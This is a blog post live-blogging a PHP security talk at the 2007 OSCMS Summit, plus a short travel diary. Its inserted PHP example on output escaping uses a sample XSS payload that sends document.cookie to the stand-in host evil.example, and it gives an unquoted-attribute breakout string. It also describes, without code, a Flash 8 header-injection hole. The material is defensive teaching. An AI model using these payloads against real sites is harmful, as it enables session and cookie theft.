via positiva

oscms2007

Rasmus is a scary man

Rasmus is explaining how someone made a JavaScript trojan horse for webmail services that is capable of compromising your home firewall and turning your computer into a zombie. Just by reading email. Yahoo Mail has since closed the hole, but I think I just heard everyone in the room gasp and shudder.

Rasmus' summary: "What this means is that you should never, ever click on a link."

Everyone laughed, but it was a nervous laugh.

He's going on to explain why it's essential to filter user input before you display it. The Drupal community internalized the importance of that kind of filtering a while ago, but there's still a large pool of folks who aren't familiar with the 'why' behind a lot of Drupal's more restrictive output handling. It's good to see a speaker instilling some serious fear around the whole "Just whip out some code that does X..." approach.
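To make the point concrete, here is the same user-supplied value rendered the "whip out some code" way and the filtered way. This is an added example written for this page, not code from the post, from Rasmus' talk, or from Drupal itself; the input string is constructed and the function names are mine. (For what it's worth, Drupal's check_plain() does essentially what html_escape() does below.)

```php
<?php
// Added example (not from the original post, Rasmus' talk, or Drupal):
// one untrusted value, rendered unsafely and then with output filtering.

declare(strict_types=1);

// Constructed sample input: what an attacker might type into a "display name" field.
$untrusted_name = '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// The "just whip out some code that does X" version: raw interpolation of user input.
// Whatever the user typed is sent, byte for byte, to every browser that views the page.
function render_greeting_unsafe(string $name): string
{
    return "<p>Hello, $name!</p>";
}

// The filtered version: escape for the HTML body / quoted-attribute context at output time.
// ENT_QUOTES escapes both " and ' so the value is also safe inside quoted attributes;
// ENT_SUBSTITUTE replaces invalid byte sequences instead of returning an empty string;
// the explicit charset keeps the escaper and the browser decoding the bytes the same way.
function html_escape(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_greeting_safe(string $name): string
{
    return '<p>Hello, ' . html_escape($name) . '!</p>';
}

// Attribute context: the same escape works, but only because the attribute is quoted.
// In an unquoted attribute a value such as   x onmouseover=alert(1)   breaks out
// without needing any < or " at all, so the escaper alone would not have saved you.
function render_profile_link_safe(string $title): string
{
    return '<a href="/profile" title="' . html_escape($title) . '">profile</a>';
}

// Run with: php example.php
echo render_greeting_unsafe($untrusted_name), PHP_EOL;
echo render_greeting_safe($untrusted_name), PHP_EOL;
echo render_profile_link_safe($untrusted_name), PHP_EOL;
```

The caveat a practitioner wants here: html_escape() is only correct for the HTML body and for quoted attribute values. A value dropped into a URL, an inline script block, a CSS rule, or an unquoted attribute needs handling specific to that context, and "cleaning" on the way in (when you don't yet know where the value will end up) is no substitute for escaping on the way out.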

Rasmus: "We should try to build software that, when it's badly configured, fails rather than exposing important information."

After explaining the huge frightening array of secholes that can be exploited, he popped up a "CMS Report Card" on all the CMS packages that are represented at the summit. Every single project had some sort of security hole. Drupal's was a bit esoteric, requiring Flash 8 and a copy of Internet Explorer.

Rasmus: "It's really hard to find a commercial CMS vendor whose site actually uses their product."

Interesting random bits: a bug in Flash 8, combined with IE, lets a Flash author inject arbitrary HTTP headers into a request -- which doesn't sound like a problem until you remember that servers implicitly trust those headers: they carry the cookies, and the Host header is what maps a request to a virtualhost. What does that mean? An attacker with a malicious Flash file can grab arbitrary cookies, hop over to other virtualhosts on the same machine, and so on.

Acrobat has similar holes -- I didn't realize that Yahoo had ripped PDFs out of their site entirely in order to avoid that sechole.

Rasmus: "When I'm surfing around to find hackable sites, I love to find hand-rolled CMS systems. I know I can hack them in a heartbeat. If I see a site is running on Drupal, or Joomla!, or another CMS? I know there may be a hole, but as soon as they fix that hole, everyone using them is safe."

The lesson? Don't write your own CMS. You have better things to do with your life.

Live from Yahoo!

Blogging live from the OSCMS Summit in Sunnyvale, hosted by Yahoo. I arrived Monday night and it's been a nonstop parade of wacky with the rest of the Lullabots and all the other Drupal folks I'm finally getting a chance to meet up with. I met Dries, which was fun, followed by Karoly (the infamous chx!) last night, and a pile of other notable folks like sepeck, UnConeD, walkah, KarenS... I'll never catch all the names, but it's definitely cool.

Tuesday, the Bots and I drove into the mountains of California to visit Skywalker Ranch, the fortified compound of awesomeness built by George Lucas. It was gorgeous -- an awesome perk of working with Lullabot -- and I posted a hundred plus photos to flickr from our tour; the folks there are doing really awesome stuff for education, and seeing them roll out a successful site with Drupal is loads of fun. Also, we kidnapped ewoks.

So I'm sitting in Rasmus' PHP performance and security talk now, surrounded by other geeks with their laptops out. It's fun, fun stuff and I'll be posting more stuff as it happens.

Viva la Drupal!
